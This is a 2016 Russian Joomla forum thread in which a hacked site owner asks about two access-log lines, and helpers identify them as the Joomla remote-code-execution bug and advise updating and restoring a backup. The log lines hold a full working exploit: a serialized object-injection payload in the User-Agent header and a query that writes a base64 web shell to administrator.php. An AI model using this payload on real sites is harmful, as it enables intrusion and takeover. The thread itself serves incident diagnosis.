Форум русской поддержки Joomla!® CMS
05.12.2016, 18:39:58 *
Добро пожаловать, Гость. Пожалуйста, войдите или зарегистрируйтесь.
Вам не пришло письмо с кодом активации?

Войти
   
   Начало   Поиск Joomla 3.0 FAQ Joomla 2.5 FAQ Joomla 1.5 FAQ Правила форума Новости Joomla Реклама Войти Регистрация Помощь  
Страниц: [1]   Вниз
  Добавить закладку  |  Печать  
Автор

Взломали сайт

 (Прочитано 536 раз)
0 Пользователей и 1 Гость смотрят эту тему.
Mc13
Захожу иногда
**

Репутация: +0/-0
Offline Offline

Сообщений: 11


« : 22.02.2016, 23:20:05 »

Всем привет! Недавно взломали мой сайт, сначала шел спам, потом сайт умер. В корневой папке было много всякой вкусности. Вроде все починил но стал параноиком) Сегодня нашел две странные строки в лог файле, пугает что на такой запрос сервер дал ответ 200. Не взлом ли это ?


173.255.143.235 - - [22/Feb/2016:20:07:55 +0300] "GET /index.php?1=%40ini_set%28%22display_errors%22%2C%220%22%29%3B%40set_time_limit%280%29%3B%40set_magic_quotes_runtime%280%29%3Becho%20%27-%3E%7C%27%3Bfile_put_contents%28dirname%28%24_SERVER%5B%27SCRIPT_FILENAME%27%5D%29.%27/administrator.php%27%2Cbase64_decode%28%27PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8%2B%27%29%29%3Becho%20%27%7C%3C-%27%3B HTTP/1.1" 200 53001 "-" "}__test|O:21:\"JDatabaseDriverMysqli\":3:{s:2:\"fc\";O:17:\"JSimplepieFactory\":0:{}s:21:\"\\0\\0\\0disconnectHandlers\";a:1:{i:0;a:2:{i:0;O:9:\"SimplePie\":5:{s:8:\"sanitize\";O:20:\"JDatabaseDriverMysql\":0:{}s:8:\"feed_url\";s:46:\"eval($_REQUEST[1]);JFactory::getConfig();exit;\";s:19:\"cache_name_function\";s:6:\"assert\";s:5:\"cache\";b:1;s:11:\"cache_class\";O:20:\"JDatabaseDriverMysql\":0:{}}i:1;s:4:\"init\";}}s:13:\"\\0\\0\\0connection\";b:1;}\xf0\x9d\x8c\x86"
173.255.143.235 - - [22/Feb/2016:20:07:56 +0300] "GET /index.php?1=%40ini_set%28%22display_errors%22%2C%220%22%29%3B%40set_time_limit%280%29%3B%40set_magic_quotes_runtime%280%29%3Becho%20%27-%3E%7C%27%3Bfile_put_contents%28dirname%28%24_SERVER%5B%27SCRIPT_FILENAME%27%5D%29.%27/administrator.php%27%2Cbase64_decode%28%27PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8%2B%27%29%29%3Becho%20%27%7C%3C-%27%3B HTTP/1.1" 200 53001 "-" "Python-urllib/2.7"
Записан
winstrool
Завсегдатай
*****

Репутация: +39/-2
Offline Offline

Пол: Мужской
Сообщений: 725


Свободен для работы


« Ответ #1 : 22.02.2016, 23:24:37 »

Взлом конечно, покажите домен, тоже зальюсь))) и вообще какой это чайник так в логах палится?
Записан
Mc13
Захожу иногда
**

Репутация: +0/-0
Offline Offline

Сообщений: 11


« Ответ #2 : 22.02.2016, 23:27:08 »

То есть это удачная попытка взлома?
Записан
winstrool
Завсегдатай
*****

Репутация: +39/-2
Offline Offline

Пол: Мужской
Сообщений: 725


Свободен для работы


« Ответ #3 : 22.02.2016, 23:32:56 »

То есть это удачная попытка взлома?
Это реализация последней нашумевшей баги RCE под Joomla

Т.е произвольное выполнение кода! могу делать что хочу с сайтом!
Записан
Mc13
Захожу иногда
**

Репутация: +0/-0
Offline Offline

Сообщений: 11


« Ответ #4 : 22.02.2016, 23:34:56 »

Что делать? сносить сайт и заливать последний бэкап? ждать обновления?
Записан
winstrool
Завсегдатай
*****

Репутация: +39/-2
Offline Offline

Пол: Мужской
Сообщений: 725


Свободен для работы


« Ответ #5 : 22.02.2016, 23:36:26 »

Обновления уже выпущены, займитесь безопасностью сайта
Записан
dmitry_stas
Профи
********

Репутация: +796/-4
Offline Offline

Сообщений: 7759



« Ответ #6 : 22.02.2016, 23:38:40 »

ждать обновления?
какая текущая версия Joomla?
Записан
Mc13
Захожу иногда
**

Репутация: +0/-0
Offline Offline

Сообщений: 11


« Ответ #7 : 22.02.2016, 23:41:20 »

Админку уже скрыл. 3.4.3. вроде как мене в аминке пишет что актуальная версия. и от инекций я тоже плагин ставил( может мне движек поменять? что то с это Joomla все плохо.
Записан
winstrool
Завсегдатай
*****

Репутация: +39/-2
Offline Offline

Пол: Мужской
Сообщений: 725


Свободен для работы


« Ответ #8 : 22.02.2016, 23:43:27 »

С джумло все норм, если следить за актуальностью, как и с любым другим продуктом, баги всегда были есть и будут, не зависимо от версии...
Записан
dmitry_stas
Профи
********

Репутация: +796/-4
Offline Offline

Сообщений: 7759



« Ответ #9 : 22.02.2016, 23:45:44 »

что то с это Joomla все плохо.
это не с Joomla плохо. последняя версия - 3.4.8
Записан
Mc13
Захожу иногда
**

Репутация: +0/-0
Offline Offline

Сообщений: 11


« Ответ #10 : 22.02.2016, 23:48:41 »

среди мои знакомых ни кого не ломают, ни на Wordpress, ни на опенкарт. а меня уже второй раз за неделю, кажется это не есть гуд
Записан
Mc13
Захожу иногда
**

Репутация: +0/-0
Offline Offline

Сообщений: 11


« Ответ #11 : 22.02.2016, 23:49:08 »

странно а почему она мне обновится не предлагает?
Записан
winstrool
Завсегдатай
*****

Репутация: +39/-2
Offline Offline

Пол: Мужской
Сообщений: 725


Свободен для работы


« Ответ #12 : 22.02.2016, 23:50:58 »

среди мои знакомых ни кого не ломают, ни на Wordpress, ни на опенкарт. а меня уже второй раз за неделю, кажется это не есть гуд
Поверте и WP, и опен карт ломают, в первую очиредь уязвимость, это человеческий фактор халатности и не внимательности, почитайте багтреки....
Записан
Mc13
Захожу иногда
**

Репутация: +0/-0
Offline Offline

Сообщений: 11


« Ответ #13 : 23.02.2016, 00:02:36 »

Сделал вручную. Но сносить все равно надо? Как вы думаете сайт уже заражен?
Записан
dmitry_stas
Профи
********

Репутация: +796/-4
Offline Offline

Сообщений: 7759



« Ответ #14 : 23.02.2016, 01:32:55 »

ломают все, какая разница что ломать? Azn банки ломают, а вы говорите opencart... Joomla далеко не самый худший вариант в плане безопасности.
сайт уже заражен.
Записан
Mc13
Захожу иногда
**

Репутация: +0/-0
Offline Offline

Сообщений: 11


« Ответ #15 : 23.02.2016, 01:41:33 »

Спасибо за инфу, так бы седел гадал) заливаю последний проверенный бэк ап и ещё раз обновлю в ручном режиме движек. а не подскажите как через htaccess заблокировать доступ всех стран кроме СНГ? Круто что я этот лог заметил. Прям горжусь собой. Правда жалко тратить по 20 минут каждый день на просмотр логов
Записан
SeBun
Практически профи
*******

Репутация: +134/-3
Offline Offline

Пол: Мужской
Сообщений: 2279



« Ответ #16 : 23.02.2016, 01:48:28 »

Спасибо за инфу, так бы седел гадал) заливаю последний проверенный бэк ап и ещё раз обновлю в ручном режиме движек. а не подскажите как через htaccess заблокировать доступ всех стран кроме СНГ? Круто что я этот лог заметил. Прям горжусь собой. Правда жалко тратить по 20 минут каждый день на просмотр логов
Задать этот вопрос поисковику не судьба? Вот ответ.

В вашем случае следует регулярно следить за обновлениями и поддерживать движок в актуальном состоянии и не пичкать его левыми расширениями. Так будет меньше шансов его взломать.
Записан
Mc13
Захожу иногда
**

Репутация: +0/-0
Offline Offline

Сообщений: 11


« Ответ #17 : 23.02.2016, 01:58:29 »

Спасибо. Тут больше инфы чем я накопал. Взламывают то боты. А расширения у меня все с оф сайтов, что попало не ставлю. Обидно просто что это так быстро все случилось на ровном месте, долбанные боты, главное IP то амерекосовское.
Записан
SeBun
Практически профи
*******

Репутация: +134/-3
Offline Offline

Пол: Мужской
Сообщений: 2279



« Ответ #18 : 23.02.2016, 02:04:29 »

долбанные боты, главное IP то амерекосовское.
Не факт. Есть такая полезная вещь, как прокси... А еще - уже взломанные сайты. Так что установка блокирования забугорных IP лишь немного затруднит работу программы. Но не заблокирует. dmitry_stas и winstrool вам выше все детально разжевали.
Записан
Mc13
Захожу иногда
**

Репутация: +0/-0
Offline Offline

Сообщений: 11


« Ответ #19 : 23.02.2016, 02:12:24 »

Буду думать о защите и чаще обновлятся. думал папки переименовать но это тоже влечет неприятные моменты. меня эти взломы сделали параноиком))) незнаю что ещё придумать. админку скрыл, JHackGuard поставил, админинтулс бесплатный. В общем буду думать. затем не буду вам парить мозги. спасибо за помощь!)))
Записан
SeBun
Практически профи
*******

Репутация: +134/-3
Offline Offline

Пол: Мужской
Сообщений: 2279



« Ответ #20 : 23.02.2016, 10:32:27 »

меня эти взломы сделали параноиком))) незнаю что ещё придумать.
Для того, что бы понять, как защитить сайт, надо знать хотя бы основные техники взлома. Как вы собираетесь ездить на танке, не зная, как им управлять? Я не говорю уже о том, что нужно крутить башню, наводить орудие, производить выстрелы и, главное, что бы тебя не подбили, иметь хоть малейшее представление о тактике боя?

Ссылка первая - сканер. Не панацея, но облегчает жизнь.
Ссылка вторая - море информации для новичка - основы, которые нужно знать!
Ссылка третья - практика взлома Joomla, начиная с первых версий.

Вот после ознакомления со всеми материалами можно будет сказать, что вы имеете представление о том, как ломают сайты, и сможете мыслить в правильном направлении. Это как получение теоретических знаний по вождению. А пока, по аналогии с танком, вы сидите, дергаете все рычаги и тыкаете на кнопки, а он, зараза, не заводится.
Записан
Mc13
Захожу иногда
**

Репутация: +0/-0
Offline Offline

Сообщений: 11


« Ответ #21 : 23.02.2016, 11:30:33 »

Спасибо за совет. сканером этим я активно пользуюсь, очень много ложных сигналов. со всем остальным ознакомлюсь.
Записан
dmitry_stas
Профи
********

Репутация: +796/-4
Offline Offline

Сообщений: 7759



« Ответ #22 : 23.02.2016, 11:36:15 »

в данном случае лучше много ложных, чем один реальный Azn
Записан
flyingspook
Moderator
*****

Репутация: +226/-9
Offline Offline

Сообщений: 3528


« Ответ #23 : 23.02.2016, 20:17:16 »

Почитайте Раздел безопасности форума в нем много информации полезной есть
Тема раз
Тема два
Тема три
и др. темы несут в себе море информации.
Записан
Страниц: [1]   Вверх
  Добавить закладку  |  Печать  
 
Перейти в:  

Powered by SMF 1.1.21 | SMF © 2006, Simple Machines

Joomlaforum.ru is not affiliated with or endorsed by the Joomla! Project or Open Source Matters.
The Joomla! name and logo is used under a limited license granted by Open Source Matters
the trademark holder in the United States and other countries.

LiveInternet